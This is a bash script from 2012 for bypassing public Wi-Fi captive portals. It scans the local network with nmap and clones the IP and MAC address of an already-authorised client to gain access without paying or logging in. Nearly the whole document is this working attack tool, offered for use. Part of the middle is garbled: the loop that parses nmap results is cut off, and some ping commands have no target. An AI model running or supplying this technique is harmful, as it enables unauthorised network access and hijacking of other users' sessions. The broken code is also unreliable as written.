#!/bin/bash # # quickly bypass most public hotspots if there are any clients connected by clonning its ip + mac addresses # version 0.2: successfully tested on 4 airports and 10 hotels using different captive portal solutions # # (c) 2012 Pau Oliva Fora - pof[at]eslack(.)org # License: GPLv2+ IFACE=wlan0 brd=`ip addr show dev $IFACE |grep inet.*brd |awk '{print $4}'` gw=`ip route |grep "^default via" |awk '{print $3}'` mac=`ip addr show dev $IFACE |grep link/ether |awk '{print $2}'` ipmask=`ip addr show dev $IFACE |grep "inet " |awk '{print $2}'` mask=`echo $ipmask |cut -f 2 -d "/"` netaddr=`sipcalc $ipmask |grep "^Network address" |awk '{print $4}'` network="$netaddr/$mask" # get gw mac ping -n -c1 -w1 $gw >/dev/null gwmac=`ip neighbour show dev $IFACE |grep lladdr |grep "^$gw " |awk '{print $3}' |tr [:upper:] [:lower:]` echo "Discovering hosts on network $network, please wait" # split large networks into /24 subnets and intercalate them if [ $mask -lt 24 ]; then sipcalc -s 24 $network |grep "^Network" |awk '{print $3}' > /tmp/sipcalc.$$ len=`cat /tmp/sipcalc.$$ |wc -l` half=$(( $len / 2 )) head -n $half /tmp/sipcalc.$$ > /tmp/subnet1.$$ tail -n $half /tmp/sipcalc.$$ |tac > /tmp/subnet2.$$ paste /tmp/subnet1.$$ /tmp/subnet2.$$ |tr "\t" "\n" > /tmp/sipcalc.$$ rm /tmp/subnet1.$$ /tmp/subnet2.$$ else echo $network |cut -f 1 -d "/" > /tmp/sipcalc.$$ fi for net in `cat /tmp/sipcalc.$$` ; do if [ $mask -lt 24 ]; then network="$net/24" else network="$net/$mask" fi nmap -n -PR -sP -oX /tmp/hotspot.$$.xml $network >/dev/null # process nmap results in reverse order for LINE in `tac /tmp/hotspot.$$.xml |grep "^
/dev/null if [ $? -eq 0 ]; then rm /tmp/hotspot.$$.xml echo "CONNECTED! :)" exit 0 fi # test a second host, just in case ping -c1 -w3 >/dev/null if [ $? -eq 0 ]; then rm /tmp/hotspot.$$.xml echo "CONNECTED! :)" exit 0 fi fi echo done rm /tmp/hotspot.$$.xml done rm /tmp/sipcalc.$$ echo "No luck! :(" # restore original mac and ip ip link set $IFACE down ip link set dev $IFACE address $mac ip link set $IFACE up ip addr flush dev $IFACE ip addr add $ipmask broadcast $brd dev $IFACE ip route add default via $gw